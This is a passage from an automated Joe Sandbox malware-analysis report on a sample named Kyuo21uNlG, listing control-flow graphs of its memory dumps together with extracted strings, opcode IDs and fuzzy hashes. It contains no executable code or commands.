                                            control_flow_graph 2814 6a230b0-6a230db 2816 6a230e2-6a231ac 2814->2816 2817 6a230dd 2814->2817 2822 6a231b3-6a231ea 2816->2822 2823 6a231ae 2816->2823 2817->2816 2826 6a231f1-6a23228 2822->2826 2827 6a231ec 2822->2827 2823->2822 2829 6a2322a 2826->2829 2830 6a2322f-6a23253 2826->2830 2827->2826 2829->2830 2832 6a23267-6a2327e call 69e11f7 2830->2832 2833 6a23255-6a23262 2830->2833 2836 6a23284-6a2329b 2832->2836 2834 6a238d6-6a238e2 2833->2834 2915 6a232a1 call 69e2518 2836->2915 2916 6a232a1 call 69e2528 2836->2916 2838 6a232a6-6a232ef 2841 6a232f1 2838->2841 2842 6a232f6-6a23339 2838->2842 2841->2842 2846 6a23864-6a2388b 2842->2846 2848 6a23891-6a238d5 2846->2848 2849 6a2333e-6a23357 2846->2849 2848->2834 2849->2836 2850 6a2335d-6a23382 2849->2850 2850->2836 2852 6a23388 2850->2852 2854 6a23389-6a233cd 2852->2854 2857 6a233d4-6a23425 2854->2857 2858 6a233cf 2854->2858 2862 6a23427 2857->2862 2863 6a2342c-6a2348b 2857->2863 2858->2857 2862->2863 2867 6a23492-6a234c9 2863->2867 2868 6a2348d 2863->2868 2871 6a234d0-6a2351b 2867->2871 2872 6a234cb 2867->2872 2868->2867 2874 6a23528-6a23569 2871->2874 2875 6a2351d-6a23522 2871->2875 2872->2871 2881 6a23570-6a235b0 2874->2881 2882 6a2356b 2874->2882 2875->2874 2876 6a2360e-6a2362b 2875->2876 2880 6a23631-6a236af 2876->2880 2892 6a236b1 2880->2892 2893 6a236b6-6a23713 2880->2893 2887 6a235b2 2881->2887 2888 6a235b7-6a23601 2881->2888 2882->2881 2887->2888 2894 6a23603-6a23608 2888->2894 2895 6a2360a-6a2360b 2888->2895 2892->2893 2900 6a23715 2893->2900 2901 6a2371a-6a23787 2893->2901 2894->2895 2896 6a2360d 2894->2896 2895->2880 2896->2876 2900->2901 2901->2854 2905 6a2378d-6a237ac 2901->2905 2905->2854 2906 6a237b2-6a237b4 2905->2906 2907 6a237c5-6a237d9 2906->2907 2908 6a237db-6a2381a 2907->2908 2909 6a2381f-6a2383c 2907->2909 2908->2909 2913 6a2381c-6a2381d 2908->2913 2909->2907 2910 6a2383e-6a2385c 2909->2910 2910->2846 2912 6a2385e-6a2385f 2910->2912 2912->2907 2913->2907 2915->2838 2916->2838
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$t
                                            • API String ID: 0-4013578003
                                            • Opcode ID: af73df71a5393b795b16a7a7e8b75175ef39a9e9838da677a20494ee4313ff4d
                                            • Instruction ID: 9214cbdd04816d29f0a425620e4d9f33d572f7e0ab4659af3b05d8876676ec2c
                                            • Opcode Fuzzy Hash: af73df71a5393b795b16a7a7e8b75175ef39a9e9838da677a20494ee4313ff4d
                                            • Instruction Fuzzy Hash: 2D32F971E012298FDB64DF69C984BDDBBB2BF49300F1482A9E409A7395DB349E81CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2917 6a20040-6a2006e 2918 6a20070 2917->2918 2919 6a20075-6a200dd 2917->2919 2918->2919 2920 6a200f6-6a20118 2919->2920 2921 6a200df-6a200f4 2919->2921 2922 6a2011a-6a2013c 2920->2922 2923 6a2013f-6a20183 2920->2923 2921->2922 2922->2923 2924 6a201b1-6a201e9 2923->2924 2925 6a20185-6a201ac 2923->2925 2926 6a20214-6a2023d 2924->2926 2927 6a201eb-6a20274 2924->2927 2928 6a2029f-6a202d3 2925->2928 2930 6a20277-6a2029d 2926->2930 2927->2930 2931 6a202d6-6a20317 2928->2931 2930->2928 2930->2931 2934 6a20319 2931->2934 2935 6a2031e-6a2034a 2931->2935 2934->2935 2937 6a20351-6a2039f 2935->2937 2938 6a2034c 2935->2938 2941 6a203a1 2937->2941 2942 6a203a6-6a203f1 2937->2942 2938->2937 2941->2942 2945 6a203f3 2942->2945 2946 6a203f8-6a20455 2942->2946 2945->2946 2949 6a20457 2946->2949 2950 6a2045c-6a20556 2946->2950 2949->2950 2956 6a20562-6a20582 2950->2956 2957 6a207fb-6a2080b 2956->2957 2958 6a20588-6a205b2 2956->2958 2959 6a205b7-6a205c5 2958->2959 2960 6a205b4-6a205b5 2958->2960 2962 6a205c7 2959->2962 2963 6a205cc-6a205d2 2959->2963 2961 6a205d4-6a205e0 2960->2961 2964 6a205e2 2961->2964 2965 6a205e7 2961->2965 2962->2963 2963->2961 2966 6a205ed-6a205f7 2963->2966 2964->2965 2965->2966 2967 6a20604-6a20607 2966->2967 2968 6a205f9-6a205fb 2966->2968 2971 6a20609 2967->2971 2972 6a2060e-6a2063b 2967->2972 2969 6a20602 2968->2969 2970 6a205fd 2968->2970 2969->2972 2970->2969 2971->2972 2973 6a2065a-6a20690 2972->2973 2974 6a2063d-6a20655 2972->2974 2976 6a20692-6a206ff 2973->2976 2977 6a206ac-6a206d0 2973->2977 2975 6a2072d-6a20745 2974->2975 2978 6a2074f-6a207a6 2975->2978 2982 6a20705-6a2072b 2976->2982 2980 6a206d2 2977->2980 2981 6a206d7-6a206dd 2977->2981 2985 6a207a8 2978->2985 2986 6a207ad-6a207f0 2978->2986 2980->2981 2981->2982 2982->2975 2982->2978 2985->2986 2986->2957
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: KDBM$nKvq$q
                                            • API String ID: 0-2699113462
                                            • Opcode ID: 5b3aeb6cd4a20a7931330cc8ee38ce4b0e38010ce305f1448e67d75d369fc502
                                            • Instruction ID: 0f39e1cb845d47790d8471bda1a9ff16c6befe63317fa44db7342d5c95e7175c
                                            • Opcode Fuzzy Hash: 5b3aeb6cd4a20a7931330cc8ee38ce4b0e38010ce305f1448e67d75d369fc502
                                            • Instruction Fuzzy Hash: BC325D74E012298FDB64DFA9C984BDDBBF2BB48310F1481A6E909A7355D730AE81CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2990 6a273e8-6a273f0 2991 6a273f2-6a27418 2990->2991 2992 6a27435-6a274db 2990->2992 2993 6a2741a 2991->2993 2994 6a2741f-6a27434 2991->2994 2999 6a274e2-6a27524 2992->2999 3000 6a274dd 2992->3000 2993->2994 2994->2992 3003 6a27526 2999->3003 3004 6a2752b-6a27563 2999->3004 3000->2999 3003->3004 3006 6a27565 3004->3006 3007 6a2756a-6a27592 3004->3007 3006->3007 3009 6a27bfe-6a27c0a 3007->3009 3010 6a27c10-6a27c1b 3009->3010 3011 6a27597-6a275a3 3009->3011 3012 6a27c23-6a27c41 3010->3012 3013 6a27c1d-6a27c1e 3010->3013 3014 6a275a5 3011->3014 3015 6a275aa-6a275c4 3011->3015 3019 6a27c43-6a27c4f 3012->3019 3020 6a27c50 3012->3020 3013->3011 3014->3015 3016 6a275c6 3015->3016 3017 6a275cb-6a27605 3015->3017 3016->3017 3023 6a27632-6a27671 3017->3023 3024 6a27607-6a27626 3017->3024 3019->3020 3041 6a27673 3023->3041 3042 6a27678-6a276b1 3023->3042 3025 6a27925-6a27937 3024->3025 3026 6a2762c-6a2762d 3024->3026 3027 6a27939 3025->3027 3028 6a2793e-6a27974 3025->3028 3029 6a276e0-6a276e7 3026->3029 3027->3028 3038 6a27976 3028->3038 3039 6a2797b-6a279c3 3028->3039 3031 6a27711 3029->3031 3032 6a276e9-6a276f5 3029->3032 3037 6a27717-6a27731 3031->3037 3034 6a276f7-6a276fd 3032->3034 3035 6a276ff-6a27705 3032->3035 3040 6a2770f 3034->3040 3035->3040 3043 6a27733-6a2773c 3037->3043 3044 6a27741-6a27780 3037->3044 3038->3039 3054 6a27b91-6a27bac 3039->3054 3055 6a279c9-6a279eb 3039->3055 3040->3037 3041->3042 3066 6a276b3 3042->3066 3067 6a276b8-6a276c5 3042->3067 3045 6a27810-6a27817 3043->3045 3068 6a27782 3044->3068 3069 6a27787-6a277c0 3044->3069 3046 6a27841 3045->3046 3047 6a27819-6a27825 3045->3047 3053 6a27847-6a2785e 3046->3053 3051 6a27827-6a2782d 3047->3051 3052 6a2782f-6a27835 3047->3052 3056 6a2783f 3051->3056 3052->3056 3058 6a27860 3053->3058 3059 6a27865-6a2789e 3053->3059 3063 6a27b90 3054->3063 3064 6a27bae-6a27bcc 3054->3064 3061 6a279f2-6a27a83 3055->3061 3062 6a279ed 3055->3062 3056->3053 3058->3059 3059->3023 3075 6a278a4-6a278b1 3059->3075 3080 6a27a85 3061->3080 3081 6a27a8a-6a27aee 3061->3081 3062->3061 3063->3054 3070 6a27bdb 3064->3070 3071 6a27bce-6a27bda 3064->3071 3066->3067 3074 6a276ce-6a276da 3067->3074 3068->3069 3085 6a277c2 3069->3085 3086 6a277c7-6a277d4 3069->3086 3070->3009 3071->3070 3074->3029 3075->3023 3079 6a278b7-6a278bc 3075->3079 3079->3054 3082 6a278c2-6a278d6 3079->3082 3080->3081 3095 6a27af0 3081->3095 3096 6a27af5-6a27b37 3081->3096 3082->3023 3084 6a278dc-6a278ee 3082->3084 3088 6a278f0 3084->3088 3089 6a278f5-6a2791f 3084->3089 3085->3086 3090 6a277dd-6a27809 3086->3090 3088->3089 3089->3025 3089->3063 3090->3024 3092 6a2780f 3090->3092 3092->3045 3095->3096 3099 6a27b39 3096->3099 3100 6a27b3e-6a27b8d 3096->3100 3099->3100 3100->3054 3103 6a27b8f 3100->3103 3103->3063
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fv$$^q$$^q
                                            • API String ID: 0-3196055999
                                            • Opcode ID: 965bdf99bbdaef572037badf2900ed7223df930e56baa4ccde8d2a4e5f45c315
                                            • Instruction ID: fccd80e0241296a428b803e4c5a6544195508048eb3d89d5f06407b0a1ad5c7f
                                            • Opcode Fuzzy Hash: 965bdf99bbdaef572037badf2900ed7223df930e56baa4ccde8d2a4e5f45c315
                                            • Instruction Fuzzy Hash: 4112E374E01229CFDB64DF6DC984B9DBBB2BF48300F14C2A5E409AB255DB34AA85CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3104 6a20007-6a2006e 3105 6a20070 3104->3105 3106 6a20075-6a200dd 3104->3106 3105->3106 3107 6a200f6-6a20118 3106->3107 3108 6a200df-6a200f4 3106->3108 3109 6a2011a-6a2013c 3107->3109 3110 6a2013f-6a20183 3107->3110 3108->3109 3109->3110 3111 6a201b1-6a201e9 3110->3111 3112 6a20185-6a201ac 3110->3112 3113 6a20214-6a2023d 3111->3113 3114 6a201eb-6a20274 3111->3114 3115 6a2029f-6a202d3 3112->3115 3117 6a20277-6a2029d 3113->3117 3114->3117 3118 6a202d6-6a20317 3115->3118 3117->3115 3117->3118 3121 6a20319 3118->3121 3122 6a2031e-6a2034a 3118->3122 3121->3122 3124 6a20351-6a2039f 3122->3124 3125 6a2034c 3122->3125 3128 6a203a1 3124->3128 3129 6a203a6-6a203f1 3124->3129 3125->3124 3128->3129 3132 6a203f3 3129->3132 3133 6a203f8-6a20455 3129->3133 3132->3133 3136 6a20457 3133->3136 3137 6a2045c-6a20556 3133->3137 3136->3137 3143 6a20562-6a20582 3137->3143 3144 6a207fb-6a2080b 3143->3144 3145 6a20588-6a205b2 3143->3145 3146 6a205b7-6a205c5 3145->3146 3147 6a205b4-6a205b5 3145->3147 3149 6a205c7 3146->3149 3150 6a205cc-6a205d2 3146->3150 3148 6a205d4-6a205e0 3147->3148 3151 6a205e2 3148->3151 3152 6a205e7 3148->3152 3149->3150 3150->3148 3153 6a205ed-6a205f7 3150->3153 3151->3152 3152->3153 3154 6a20604-6a20607 3153->3154 3155 6a205f9-6a205fb 3153->3155 3158 6a20609 3154->3158 3159 6a2060e-6a2063b 3154->3159 3156 6a20602 3155->3156 3157 6a205fd 3155->3157 3156->3159 3157->3156 3158->3159 3160 6a2065a-6a20690 3159->3160 3161 6a2063d-6a20655 3159->3161 3163 6a20692-6a206ff 3160->3163 3164 6a206ac-6a206d0 3160->3164 3162 6a2072d-6a20745 3161->3162 3165 6a2074f-6a207a6 3162->3165 3169 6a20705-6a2072b 3163->3169 3167 6a206d2 3164->3167 3168 6a206d7-6a206dd 3164->3168 3172 6a207a8 3165->3172 3173 6a207ad-6a207f0 3165->3173 3167->3168 3168->3169 3169->3162 3169->3165 3172->3173 3173->3144
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: KDBM$nKvq$q
                                            • API String ID: 0-2699113462
                                            • Opcode ID: 09f374ebbd5b45b4396c70153c56055861c31c1487d120dffe5be7b2169ea85e
                                            • Instruction ID: 1707569d9bc9454c980a453714963928b1e1f23bb619527407217ad86efa76d1
                                            • Opcode Fuzzy Hash: 09f374ebbd5b45b4396c70153c56055861c31c1487d120dffe5be7b2169ea85e
                                            • Instruction Fuzzy Hash: 4C028F74E012298FDB64DF69C984BDDBBB2BF49310F1481A6E809A7355DB34AE81CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3177 b01070-b01090 3178 b01092 3177->3178 3179 b01097-b0112a 3177->3179 3178->3179 3186 b01132-b01167 3179->3186 3189 b01169 3186->3189 3190 b0116e-b011ce 3186->3190 3189->3190 3192 b011d0-b01200 3190->3192 3193 b011d3-b011f3 3190->3193 3195 b01203-b0122b 3192->3195 3193->3195 3197 b01238-b0123b 3195->3197 3198 b0122d-b0122f 3195->3198 3201 b01242-b01287 3197->3201 3202 b0123d 3197->3202 3199 b01231 3198->3199 3200 b01236 3198->3200 3199->3200 3200->3201 3206 b01289 3201->3206 3207 b0128e-b012b3 3201->3207 3202->3201 3206->3207 3208 b012b5 3207->3208 3209 b012ba-b012fd 3207->3209 3208->3209 3213 b01304-b0139b 3209->3213 3214 b012ff 3209->3214 3217 b013c0-b013f1 3213->3217 3218 b0139d-b014d4 3213->3218 3214->3213 3220 b01413-b0143d 3217->3220 3221 b013f3-b0146f 3217->3221 3227 b014d7-b01521 3218->3227 3223 b01444-b01447 3220->3223 3224 b0143f 3220->3224 3225 b01472-b01498 3221->3225 3223->3225 3224->3223 3225->3227 3231 b01523 3227->3231 3232 b01528-b01566 3227->3232 3231->3232 3234 b01568 3232->3234 3235 b0156d-b0157c 3232->3235 3234->3235 3236 b01583-b015b0 3235->3236 3237 b0157e 3235->3237 3237->3236
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 35OG$5xID$]/
                                            • API String ID: 0-1761396499
                                            • Opcode ID: 52b4043cea25f1ffe7a76bf4ee1c81e7b599ffa1746f33c04b39ac17e91d8e52
                                            • Instruction ID: eca03af912342e86a717ba3f28107b0de0fecfdbaa77177a47c5a773965116e2
                                            • Opcode Fuzzy Hash: 52b4043cea25f1ffe7a76bf4ee1c81e7b599ffa1746f33c04b39ac17e91d8e52
                                            • Instruction Fuzzy Hash: 2F02C374E002198FDB54DFA9D980A9DBBF1FF48304F1081AAE409EB355EB34AA85CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3239 6870fa0-6870fc0 3240 6870fc7-6871010 3239->3240 3241 6870fc2 3239->3241 3242 6871017-6871028 3240->3242 3243 6871012 3240->3243 3241->3240 3245 687102e-6871071 3242->3245 3246 687110c-687116b 3242->3246 3243->3242 3249 6871073-687108b 3245->3249 3250 687108d-68710b8 3245->3250 3247 6871181-687119d 3246->3247 3248 687116d-68711cf 3246->3248 3254 68712f0-68712ff 3247->3254 3255 68711d1-68712ce 3248->3255 3256 68711ee-6871218 3248->3256 3252 68710ba-68710d2 3249->3252 3251 68710dc-6871107 3250->3251 3250->3252 3262 6871305-68717da 3251->3262 3252->3251 3254->3262 3263 68712d4-68712ed 3255->3263 3260 6871234-687125a 3256->3260 3261 687121a-687127c 3256->3261 3265 6871282-68712a8 3260->3265 3261->3265 3267 68717df-68717e7 3262->3267 3268 68717dc-68717dd 3262->3268 3263->3254 3265->3263 3269 68717e9-68717f6 3267->3269 3270 68717f9-6871806 3267->3270 3268->3269 3269->3270 3271 687180d-687184b 3270->3271 3272 6871808 3270->3272 3274 687185e-6871882 3271->3274 3275 687184d-6871859 3271->3275 3272->3271 3276 6871884-68718c6 3274->3276 3277 6871892-68718ae 3274->3277 3278 68718f9-6871940 3275->3278 3283 68718d3-68718d6 3276->3283 3284 68718c8-68718ca 3276->3284 3280 68718e0-68718f4 3277->3280 3281 6871942-687194e 3278->3281 3282 6871950-687196f 3278->3282 3280->3278 3285 68719a6-68719bc 3280->3285 3286 6871971-687198a 3281->3286 3282->3286 3287 6871990-68719a3 3282->3287 3290 68718dd 3283->3290 3291 68718d8 3283->3291 3288 68718d1 3284->3288 3289 68718cc 3284->3289 3292 68719c4-68719d0 3285->3292 3286->3287 3287->3285 3288->3290 3289->3288 3290->3280 3291->3290 3337 68719d6 call 6872984 3292->3337 3338 68719d6 call 68729b8 3292->3338 3293 68719dc-6871a21 3294 6871a23-6871a2c 3293->3294 3295 6871a2e-6871a4a 3293->3295 3296 6871a4c-6871a65 3294->3296 3295->3296 3297 6871a6b-6871a75 3295->3297 3296->3297 3298 6871a77-6871a79 3297->3298 3299 6871a82-6871a85 3297->3299 3300 6871a80 3298->3300 3301 6871a7b 3298->3301 3302 6871a87 3299->3302 3303 6871a8c-6871ac5 3299->3303 3300->3303 3301->3300 3302->3303 3305 6871ac7-6871ad3 3303->3305 3306 6871ad5-6871aed 3303->3306 3307 6871afc-6871b15 3305->3307 3308 6871af4-6871afa 3306->3308 3309 6871aef 3306->3309 3310 6871b1b-6871b34 3307->3310 3308->3307 3308->3310 3309->3308 3311 6871b3f-6871b6f KiUserExceptionDispatcher 3310->3311 3312 6871b76-6871ba6 3311->3312 3313 6871b71 3311->3313 3315 6871df2-6871e1a 3312->3315 3316 6871bac-6871bc1 3312->3316 3313->3312 3322 6871e1b-6871e26 3315->3322 3318 6871bc3-6871bc5 3316->3318 3319 6871bce-6871bd1 3316->3319 3323 6871bc7 3318->3323 3324 6871bcc 3318->3324 3320 6871bd3 3319->3320 3321 6871bd8-6871c27 3319->3321 3320->3321 3325 6871c4f-6871c84 3321->3325 3326 6871c29-6871c4d 3321->3326 3323->3324 3324->3321 3327 6871c89-6871cc0 3325->3327 3328 6871d88-6871db7 3325->3328 3326->3327 3329 6871cc2-6871ce6 3327->3329 3330 6871ce8-6871d1f 3327->3330 3334 6871dbe-6871df0 3328->3334 3335 6871db9 3328->3335 3331 6871d21-6871d51 3329->3331 3330->3331 3333 6871d57-6871d82 3330->3333 3331->3333 3333->3328 3334->3322 3335->3334 3337->3293 3338->3293
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: S7`
                                            • API String ID: 0-3296622871
                                            • Opcode ID: 8bce2a7fbaee2c1fb1cbd6ea366d94c38c1bf3b2037f84a5fb510c2ffd0bb3a9
                                            • Instruction ID: 48cef7a6e5026d5b0f680aaafa901b0650c717d66b7b49d2255112ace9c45c89
                                            • Opcode Fuzzy Hash: 8bce2a7fbaee2c1fb1cbd6ea366d94c38c1bf3b2037f84a5fb510c2ffd0bb3a9
                                            • Instruction Fuzzy Hash: 5252A074E012298FDBA0CF69D984B9DBBF1BB49300F1481E6E849E7355E734AA81CF50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: ,
                                            • API String ID: 2994545307-3772416878
                                            • Opcode ID: 29f55c34be8955d456e0144cfed3f46276ef68c6525322acff57510af6ed3be5
                                            • Instruction ID: fad53b1912ade5411925fe9af4a6b1c0f9503ebee1137b372e4d8d9985b1dae5
                                            • Opcode Fuzzy Hash: 29f55c34be8955d456e0144cfed3f46276ef68c6525322acff57510af6ed3be5
                                            • Instruction Fuzzy Hash: 1931BE74E012189FCB54DFA9E994ADDBBB2FF48320F149229E404A7365DB34A981CB94
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0b~$P}\
                                            • API String ID: 0-94426273
                                            • Opcode ID: 5cb32581c277a552a0a6364431108f378ae7812f6f81ce2e34771a191adb7a1d
                                            • Instruction ID: de01d4078e6f8b00871f5b984eb2dab708ef6ce72c81c0f389373f26c2ca8cda
                                            • Opcode Fuzzy Hash: 5cb32581c277a552a0a6364431108f378ae7812f6f81ce2e34771a191adb7a1d
                                            • Instruction Fuzzy Hash: 91821B74E452298FDBA0DF68C984BD9BBF1AB49300F1081E6E81CE7351E734AE858F50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %E$%KaM
                                            • API String ID: 0-4103438776
                                            • Opcode ID: 9922b9a974bd5de0db10a4c838ae278dca05c4b6c7807aa9f06a68a2844fc515
                                            • Instruction ID: dee807e119f8dea5c83494c7bdce34ff8d9fb09f6d0322b94dd11d0e5a3dd1f1
                                            • Opcode Fuzzy Hash: 9922b9a974bd5de0db10a4c838ae278dca05c4b6c7807aa9f06a68a2844fc515
                                            • Instruction Fuzzy Hash: 93520574E002198FDB64CFA9D880B9DBBB2BF48310F14D6A5E409AB355DB34AE81CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,$`
                                            • API String ID: 0-1136971775
                                            • Opcode ID: 605c3a11f463c294170d9b6c5cd7d85de17002d5cae029198ef772e6fd85c071
                                            • Instruction ID: 59a29f63461d09605799d8cd743f3d7927c5292f4c2eec64c16739b4bd17dc15
                                            • Opcode Fuzzy Hash: 605c3a11f463c294170d9b6c5cd7d85de17002d5cae029198ef772e6fd85c071
                                            • Instruction Fuzzy Hash: C452A074E01228CFDB64DF69C985BDDBBB2BB49300F1481AAE419A7355DB74AE81CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Ln$\Lg
                                            • API String ID: 0-1604738764
                                            • Opcode ID: e565ddbefb592eb4dcd886d73a7a50ee2e0b19f8ff65481ae98b5b7d6b86dc34
                                            • Instruction ID: b4365aaa6e1587047e7f30edb76ed901e122152635c962fc842159c21eaae292
                                            • Opcode Fuzzy Hash: e565ddbefb592eb4dcd886d73a7a50ee2e0b19f8ff65481ae98b5b7d6b86dc34
                                            • Instruction Fuzzy Hash: B742A074E01219CFDB54CFA9C980A9DBBF1FB49300F1482AAD809EB355E734AA85CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: J$$^q
                                            • API String ID: 0-1080976218
                                            • Opcode ID: c16566bb17faf8c20124eb486c229bf8fb4d6e394f6463be9944307230eeff08
                                            • Instruction ID: 9a4e88bff9ac2c409b356f09f3becaf153f4e97bb54f21f0e3e329049f079f1f
                                            • Opcode Fuzzy Hash: c16566bb17faf8c20124eb486c229bf8fb4d6e394f6463be9944307230eeff08
                                            • Instruction Fuzzy Hash: 40429C74E00629CFDBA4CF69D984B9DBBF1BB49300F1486A6E509E7355E730AA81CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \$\
                                            • API String ID: 0-710662773
                                            • Opcode ID: 2c4d09f490f7c758fdc3e5c511b1444da46cc23ed3b96ed2d5dd4c02fe8d1bf1
                                            • Instruction ID: c0cf416fbf1112ea82fce6b578035d1389166d3a3486e3618bcdc662aaf461fa
                                            • Opcode Fuzzy Hash: 2c4d09f490f7c758fdc3e5c511b1444da46cc23ed3b96ed2d5dd4c02fe8d1bf1
                                            • Instruction Fuzzy Hash: 6732D474A00219CFDB64DF68C984BDDBBB1BF49310F2492A5E40AA7795DB34AE81CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Ln$\Lg
                                            • API String ID: 0-1604738764
                                            • Opcode ID: 29d252f6ec5c10e865bec7bfdc5fe9bb5c4966e1879a4f4dfa5f5df2c46b88a5
                                            • Instruction ID: a212332a90b61004369fe92b609a5b50e7f0bb88e22d66157b3f0514d4f47b3b
                                            • Opcode Fuzzy Hash: 29d252f6ec5c10e865bec7bfdc5fe9bb5c4966e1879a4f4dfa5f5df2c46b88a5
                                            • Instruction Fuzzy Hash: 1C127F74E01219CFDB54CFA9C980A9DBBF2FF49304F1482AAD409AB355E734AA85CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Ln$\Lg
                                            • API String ID: 0-1604738764
                                            • Opcode ID: 74a15944fbe91c901f8cf7ad337312622f1df0ff33031ee7b9eea06d423db3ac
                                            • Instruction ID: ab2363948317d8c0586f228555e79e063d3e35b2e131e4102b0b557323d37160
                                            • Opcode Fuzzy Hash: 74a15944fbe91c901f8cf7ad337312622f1df0ff33031ee7b9eea06d423db3ac
                                            • Instruction Fuzzy Hash: 24127F74E01219CFDB54CFA9C980A9DBBF2FF49304F1482AAD409AB355E734AA85CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$h
                                            • API String ID: 0-3215084831
                                            • Opcode ID: ffe489ec2b7b6d83f438b3d6eaf3982050ab33932673e6a69200d683b1549866
                                            • Instruction ID: 2f3a7bf8b68824373f9872946bc89a1c7bf6b6dfd43fba6ebf019e5717449fae
                                            • Opcode Fuzzy Hash: ffe489ec2b7b6d83f438b3d6eaf3982050ab33932673e6a69200d683b1549866
                                            • Instruction Fuzzy Hash: D7F1D471E012188FDB64DF6AC9857DEBBB2BF89300F14C1E9D409AB255DB349A85CF41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
